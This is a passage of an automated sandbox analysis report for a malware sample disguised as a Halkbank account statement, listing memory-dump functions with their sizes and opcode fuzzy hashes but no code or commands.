Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d576007eca33d0f55ddff5096c6a2f93f7a38fc20e215062399cc20a4d295cbf
Instruction ID: 6c5612ba1d05b32a6ff3a1323b5f277cd54049e0c1399a712fa58ca631c21543
Opcode Fuzzy Hash: d576007eca33d0f55ddff5096c6a2f93f7a38fc20e215062399cc20a4d295cbf
Instruction Fuzzy Hash: 4482813A600501EFDB06DF98C948DA9BBB2FF4D314B168095E6469F276C772E861EF40

Uniqueness

Uniqueness Score: -1.00%

Function 05DA0658 Relevance: .7, Instructions: 667COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a37ef1a2f4abe0fb389b236b83c4817e1a41b7c9ce2296df24e6454bb6624013
Instruction ID: 06d64172696db575e958bdba916983fe34e09ea8169a6e8de9d300cf8eeaa94a
Opcode Fuzzy Hash: a37ef1a2f4abe0fb389b236b83c4817e1a41b7c9ce2296df24e6454bb6624013
Instruction Fuzzy Hash: D5525D76E15269CFDB25DF2488487AEBAF6AF88304F10449BD54AE7741DB748E80CF81

Uniqueness

Uniqueness Score: -1.00%

Function 05DA1520 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5827926edfa36d47a5022af5cf46ca1aaebb7af626fed814bf82a00202e34199
Instruction ID: f1a85257d9fd9f8bc1a905e39a47bebd652ad8597c1117e5033a9ee37553e37c
Opcode Fuzzy Hash: 5827926edfa36d47a5022af5cf46ca1aaebb7af626fed814bf82a00202e34199
Instruction Fuzzy Hash: 9E22F431E04259CFCB15DFE4C444AAEFBF6BF85300F2884AAD445AB256DB719C45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05DBEED0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecd7b779b8333f222d03717d6c4f0151cf8e96e91576bbc46f8a235d32845da
Instruction ID: 18281a2f2b7d26af50a6a272e94b62e2e35c4c6e54ff55734426d2ca76d5052e
Opcode Fuzzy Hash: 1ecd7b779b8333f222d03717d6c4f0151cf8e96e91576bbc46f8a235d32845da
Instruction Fuzzy Hash: FC328F3A600504DFDB05DF98C988DA9BBB2FF49314B1680A9E6069B376C772EC51EF50

Uniqueness

Uniqueness Score: -1.00%

Function 05DBEF91 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62fc07f09977c727d5284868b74d7d5396035da0243e8a9d532460edd78c400a
Instruction ID: a3d36ec84308b0154ad8817e223659fb7c6199a5b761bb26b10b298d2f3f6d3f
Opcode Fuzzy Hash: 62fc07f09977c727d5284868b74d7d5396035da0243e8a9d532460edd78c400a
Instruction Fuzzy Hash: D3226F3A600505DFDB05DF98C988DA9BBB2FF4D314B168099E6069B276C772EC61EF40

Uniqueness

Uniqueness Score: -1.00%

Function 05DA0048 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d02727bfffbc53941fbaa4ddfe9dc5fa5680f94e4cee9b88baadb72e26dd04
Instruction ID: d20811277a64dd9a7b2e3fd56f2d59550d344b71f2a7a6aa350af634131219d4
Opcode Fuzzy Hash: b6d02727bfffbc53941fbaa4ddfe9dc5fa5680f94e4cee9b88baadb72e26dd04
Instruction Fuzzy Hash: 52E10336B052158FCB25DAB8881866FBAF7BFC9204F18846BD446EB641DF74CC41C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05DB8FE0 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6cd1c4fad84daa4232ae2605bb3efb72f6b1e9236276def653718e082edfa23
Instruction ID: af071d750b004b2db58934d2a5a50a37eb60234d1c76cec0518a2a38fbf925e8
Opcode Fuzzy Hash: a6cd1c4fad84daa4232ae2605bb3efb72f6b1e9236276def653718e082edfa23
Instruction Fuzzy Hash: A9025974A04284CFDB14DBA4D864AADB7F3BF89700F25816AE6479B3A5CB71DC41CB41

Uniqueness

Uniqueness Score: -1.00%

Function 05DBD598 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c6a09aea11d8abe59d0eb06fa106a314aefd633af6f09492a38d2af8d599ec
Instruction ID: 0a90772a7fcb4a4d293bb6db2689516f188a0f8fc02137e5d3c4d4fde749e693
Opcode Fuzzy Hash: 54c6a09aea11d8abe59d0eb06fa106a314aefd633af6f09492a38d2af8d599ec
Instruction Fuzzy Hash: 37E1F574A04219DFEB14EBA5C894BEDBBB7BF48200F15846AE447AB364DBB0DD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB62B9 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167bd528d1a431840665992851570f33200df71c958bc12d2d331f825b788496
Instruction ID: 355382d8fb250d9789e8d6f79568a9c846a9c8ae89d50364c909030502749e31
Opcode Fuzzy Hash: 167bd528d1a431840665992851570f33200df71c958bc12d2d331f825b788496
Instruction Fuzzy Hash: 82D17931A0452ADFDB10CF98C8849EEB7F3FB88310B54856AE517E7245D7B0E951CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DBC8E0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce5148d30b07e2b08a1775822eef37ca4eb683ddc66829a7fe5e69425475c55
Instruction ID: 6ba47172e2ea63e365689bf31ef4af46f77e4e0b789ca129860d5802d208b7f7
Opcode Fuzzy Hash: 6ce5148d30b07e2b08a1775822eef37ca4eb683ddc66829a7fe5e69425475c55
Instruction Fuzzy Hash: 64D18C74B10216CFEB18EFB8D4A85ACBBB3BB89205700846ED447DB365DBB59C45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 05DA1CDD Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c7454fbecab300478be08fb2beb389dbf0a0554a38fc9d3aceef2e65b54e13
Instruction ID: 84726dbe1a7a6039672b602f4085a2b937a7b36fe04496c26864a99a2d39f9d9
Opcode Fuzzy Hash: 35c7454fbecab300478be08fb2beb389dbf0a0554a38fc9d3aceef2e65b54e13
Instruction Fuzzy Hash: A4C13672A0D7A18FC3169B64C814267FBF2BF82210F1989EBD0959F686C7319C45C793

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F284 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef58b777ab635e1fc43b8c148b93464ff15d494e7ecceec43b7da48bb71eec6
Instruction ID: 370e5e22d13a4de726513b7c53cf26e91cdbc9cfa378b78fcd92eb5e051ca36e
Opcode Fuzzy Hash: bef58b777ab635e1fc43b8c148b93464ff15d494e7ecceec43b7da48bb71eec6
Instruction Fuzzy Hash: AB11C6753481448FC750DBB8E494AAA7FE6FFC5345B1444A9E186CB7A2CA24CC059761

Uniqueness

Uniqueness Score: -1.00%

Function 05E935C0 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2270a07d0f6e669dd9fa1d4850df1619e7058221b7e2f467358fd05649d8be20
Instruction ID: 1a37ac7f6239f73a927213a5b86cff13ba4702af06a64d66275696b0588adc6d
Opcode Fuzzy Hash: 2270a07d0f6e669dd9fa1d4850df1619e7058221b7e2f467358fd05649d8be20
Instruction Fuzzy Hash: 6ED18E75A04254DFDF18DFA4C454AADB7B7BF88300F15986AE486AB396DB30EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05E95FE0 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5869bcea1559af8c342e77bca641b74ebee7dab4f5636c2e0db46aa07da8d2b
Instruction ID: e5c49349ae8b6d6caceab7964219167da73ee5a63ad3482acc7b88e80a33b36c
Opcode Fuzzy Hash: b5869bcea1559af8c342e77bca641b74ebee7dab4f5636c2e0db46aa07da8d2b
Instruction Fuzzy Hash: 39D16F30A04215DFDF18DFA4C8849AEBBB2FF89314B15A56BE4569B361EB30EC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05DB8A48 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b9d24d525729a4a0fdab9adcd421d4aab757f771b62f54106872a1ae0e4ba3
Instruction ID: 74997ef5f68499aafabd87e66e5dc18f56f2cc7e22f1bf8b2c471ed78bed6241
Opcode Fuzzy Hash: a5b9d24d525729a4a0fdab9adcd421d4aab757f771b62f54106872a1ae0e4ba3
Instruction Fuzzy Hash: 48C16C70B04254CFDB15DF64C8906EDBBB7AB89300F1485ABD04BAB342CBB58D869F91

Uniqueness

Uniqueness Score: -1.00%

Function 05DBB390 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 306432c277270306b83b7c6ca9bcc0ead37270701054fd18f6d7281507c265a8
Instruction ID: 0f26a8f3eedc95fce2f3e970695693ef3d2a35c0acbbd593f467b702f13aec15
Opcode Fuzzy Hash: 306432c277270306b83b7c6ca9bcc0ead37270701054fd18f6d7281507c265a8
Instruction Fuzzy Hash: BDB11B30A04208DFFB15DBA0C8546ADBBB3BF89704F14806BE543AB394DBB59945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05DB6168 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eefac4ba6157b92a86264422f7801c4b25e43be8162b42543579bcdc398e53bc
Instruction ID: 770202d9a6028aafa995f6de5943b510056855a3b4266725196b5c956a7c741e
Opcode Fuzzy Hash: eefac4ba6157b92a86264422f7801c4b25e43be8162b42543579bcdc398e53bc
Instruction Fuzzy Hash: 26B15831A09119EFEF10CF98D984AEEBBB7FB44340F158566E507A7245D7B0E841CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05DBA078 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d82cb6edb665a864082b20da39ec4c4e091f5e650bf6e3d32c1e4f04594b2d
Instruction ID: d665b5966c24dec9dba15eaf58f9275bdad973f764291b5cd5aafea23e7bfa40
Opcode Fuzzy Hash: 66d82cb6edb665a864082b20da39ec4c4e091f5e650bf6e3d32c1e4f04594b2d
Instruction Fuzzy Hash: 7EB18F30A04209DFEB14DBA4C854AEEB7B7BF85200B55846AD447AB761CBB1EC81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05E96448 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ce66c51eae32b08106e14bbea00837a49c89e9cb6a9fb0f9b3641a49452004
Instruction ID: 0c3ee80c65df7b006fc136a52af905a8b7fdbe7d153a9df6a52225f74ac7acaf
Opcode Fuzzy Hash: 47ce66c51eae32b08106e14bbea00837a49c89e9cb6a9fb0f9b3641a49452004
Instruction Fuzzy Hash: F6A10371714551CFDF18DF78C898A69B7E6BF8970471614AAE582CB372EB21EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05DB3354 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5859315c96ee9fdc318a52d0b56ca5cfdd7dacbd0f0e25fb59922252324a9bd8
Instruction ID: 3ac0864d3730583d1500e0a51fb09bbd03e9d7e5a7872b0bd945ee189344cbd2
Opcode Fuzzy Hash: 5859315c96ee9fdc318a52d0b56ca5cfdd7dacbd0f0e25fb59922252324a9bd8
Instruction Fuzzy Hash: 6FB1CE74A00616DFDB04CF68C884AAAB7F3FF48315B148A5AE51ADB762D771EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05E99C28 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa6c4542deb164b5cbbb3fc3c7fb0b96cf1aa99c7f5ff182a6984e56d8886b9
Instruction ID: 94b6d815b801d3ce5bc636afa81a662d9f206b31a04e1512b7032a76ee29df42
Opcode Fuzzy Hash: 5fa6c4542deb164b5cbbb3fc3c7fb0b96cf1aa99c7f5ff182a6984e56d8886b9
Instruction Fuzzy Hash: CDA1CB35B01204DFDB18CBA5D894AADBBF6FF89214F14806AE851DB392CB36DD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05DB8A39 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1343ee298757db08bc9c4bd42bbd4143d49b892e3cc3a6113cf1ff9336c33db
Instruction ID: 2759617cc450b982a937529610c716b664a88ee69c73e6cc3a147d6004f9ec5d
Opcode Fuzzy Hash: d1343ee298757db08bc9c4bd42bbd4143d49b892e3cc3a6113cf1ff9336c33db
Instruction Fuzzy Hash: 84B14B71B10264CFDB65DF64C8506ADB6B7FB89300F1484AAE04BAB341CBB59D829F91

Uniqueness

Uniqueness Score: -1.00%

Function 05DBC060 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd2aa47665cd8c8baba40d39fa4b100230f96ef33ebbd7aa4c05f5f281456598
Instruction ID: a289c98770b92ab8854cf2cc1043f2a68a6a6ad685e3fc3283afa0cbdda22ad0
Opcode Fuzzy Hash: cd2aa47665cd8c8baba40d39fa4b100230f96ef33ebbd7aa4c05f5f281456598
Instruction Fuzzy Hash: 8091DA71B28016CBAF18EB6498741FC32A3BBC4351B41021FE587EB3A0DFB58D419796

Uniqueness

Uniqueness Score: -1.00%

Function 05DBAC88 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58eeb98c12d17bfa4acb2e4115ab15fcc27be52c0a8ca6bd6b242b9658469b47
Instruction ID: 1e396debd0dfb2ca4ad7efec886df64dc441f165c6f4a858667b366fea39d881
Opcode Fuzzy Hash: 58eeb98c12d17bfa4acb2e4115ab15fcc27be52c0a8ca6bd6b242b9658469b47
Instruction Fuzzy Hash: A5919B74B04244CFDB18EF68C8645AD77B3FB89306B10846EE0839B351EA79ED46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 05E9F100 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fd03b88311df4aaedfbda7c71452fc63f7a2e5224d58ea6643d81c5b562255
Instruction ID: d2474648dc56fe3ec6cac621a83e877ca342f26a009afe2427bda06323c31777
Opcode Fuzzy Hash: 25fd03b88311df4aaedfbda7c71452fc63f7a2e5224d58ea6643d81c5b562255
Instruction Fuzzy Hash: 91711F357042149FEB19EFB8D8546AE7BAAAFC4209F114829E846CF3A5DF34DD0287D1

Uniqueness

Uniqueness Score: -1.00%

Function 05DB4520 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8720ad8b6121fb25f60d237c8f42512170382e91584aa683e71d31ca6a56d9db
Instruction ID: bf631d22abf2dc9b2622324ea7a53fffa7e174971df5280d6bc064e5c811de7b
Opcode Fuzzy Hash: 8720ad8b6121fb25f60d237c8f42512170382e91584aa683e71d31ca6a56d9db
Instruction Fuzzy Hash: EB819E31604614DFDF14DFA8C8549EEB7F7BF89210B10852AE487DB262CBB1E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05DB5BE0 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec08593202fcfd68122e77b27dcf296e2f1c4fa11296e8bcd6120b88e07d448
Instruction ID: c231cc2cb1596b1f3ac03f1a0c15685816cc6205b77d3a8ac603dc05dfebadee
Opcode Fuzzy Hash: fec08593202fcfd68122e77b27dcf296e2f1c4fa11296e8bcd6120b88e07d448
Instruction Fuzzy Hash: 7181B031A05218DFDB11CFA4E8849EDBBB3FF89310F14856AE456E7251E775AC01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05DBD587 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e72357e0fd31a21b298e9462bbdc88a35c053bf3d74568cf300fcb183c62fd
Instruction ID: 5187d6a7a3c53168e1c770b7248811a99b7e26d99ee08ec7b003af9ea4aad94b
Opcode Fuzzy Hash: 76e72357e0fd31a21b298e9462bbdc88a35c053bf3d74568cf300fcb183c62fd
Instruction Fuzzy Hash: 36810674A15219DFEB14EFA5C894BEDBBB7BF48200F158026E847AB364DAB0DD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DA1699 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2cd380d60ef68bd904f5b3b9b5225a55b3327331851a8573931af1645678157
Instruction ID: 20bdf5adf6f5e8ccbe6937f09258f58d8dfc160b1974c68b9aebc35b0cf02abc
Opcode Fuzzy Hash: a2cd380d60ef68bd904f5b3b9b5225a55b3327331851a8573931af1645678157
Instruction Fuzzy Hash: DE818F76E00219CFCB25DFE4C8809AEB7B6BF85300F64455BD499AB255C731AC41CF52

Uniqueness

Uniqueness Score: -1.00%

Function 05DB24C0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e03f0ef62dc4620e157bbe2a9cf9e01c9bf4c4151d5b02e79f89fd9e9166c8b
Instruction ID: 1fdf11341bbf36b7aa30cbfc80fde3bed15a856a595dfc3a5d82caef957628bc
Opcode Fuzzy Hash: 3e03f0ef62dc4620e157bbe2a9cf9e01c9bf4c4151d5b02e79f89fd9e9166c8b
Instruction Fuzzy Hash: 7951263B708210DBE310EA59DC506EAFBA7EBD1320F04C527D5478B655CAB1D805C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 05DB51E8 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98c1cf4bc1e501df7867f34e14612decefeeaf30fdce2b35db7d66701f7cac4
Instruction ID: 01bd19ff384cfe62251aff72d66735af939c86b7e8a2efd3321cef5f36ce395e
Opcode Fuzzy Hash: a98c1cf4bc1e501df7867f34e14612decefeeaf30fdce2b35db7d66701f7cac4
Instruction Fuzzy Hash: D461F731608654DFEB25DBA8E880AEEBBF3BF85304F50451BD5839B740EBB1E9418791

Uniqueness

Uniqueness Score: -1.00%

Function 05DB7460 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48463f48e5a9628705171f7283e3ab4c18238ef49f4614a83b6faa8e3765c077
Instruction ID: 4be049c77313405bcdbf38eef3c3be5c908758acbdf1ff8dbc1c38641720e3f9
Opcode Fuzzy Hash: 48463f48e5a9628705171f7283e3ab4c18238ef49f4614a83b6faa8e3765c077
Instruction Fuzzy Hash: 6E714930A04209DFDB14CF68C484AE9BBF3FB88314F158596E556AB391C7B1ED85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05DBB020 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3b9158bd13de554ee4217125dbadea7833f1f46c9fb2dda958b1ccc62ac1df
Instruction ID: 9b58b76494bc6535e5c5515d8f2673da8568ed106709aa94246a93a00e3cf908
Opcode Fuzzy Hash: ab3b9158bd13de554ee4217125dbadea7833f1f46c9fb2dda958b1ccc62ac1df
Instruction Fuzzy Hash: 4E714A74A04619CFEB14CFA4C854AAEB7B3FF89300B11856AD557AB365DBB0EC81CB40

Uniqueness

Uniqueness Score: -1.00%

Function 05DBE5B8 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b03eb62fbdcaa249c2488adac7dea459b3feffc69686a9c4a4962f82e35e4ae
Instruction ID: 18f9b1e9a803a7f69f40fbc35ccba4fd1bd36a3d04252c6ddb01bad8ffb18502
